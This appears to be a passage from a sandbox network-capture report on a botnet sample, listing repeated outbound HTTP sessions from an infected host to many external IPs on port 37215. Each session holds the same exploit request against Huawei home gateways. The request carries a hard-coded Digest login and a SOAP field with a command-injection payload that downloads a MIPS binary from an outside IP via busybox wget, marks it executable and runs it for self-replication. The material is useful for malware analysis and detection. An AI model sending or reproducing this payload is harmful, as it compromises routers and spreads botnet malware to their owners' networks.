                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          856192.168.2.2339780157.83.121.9437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.244818926 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          857192.168.2.235994641.224.222.2237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.245229959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          858192.168.2.2340934157.209.35.9137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.245275021 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          859192.168.2.2354104157.49.141.4437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.245835066 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          860192.168.2.234437441.238.80.21337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.246155024 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          861192.168.2.234871041.119.78.9337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.246725082 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          862192.168.2.2332940125.107.199.1637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.247144938 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          863192.168.2.2351144197.222.24.15337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.247184992 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          864192.168.2.2360576198.61.29.4037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.247622967 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          865192.168.2.2356958197.223.117.11237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.247668028 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          866192.168.2.2341778120.198.232.3837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.248028040 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
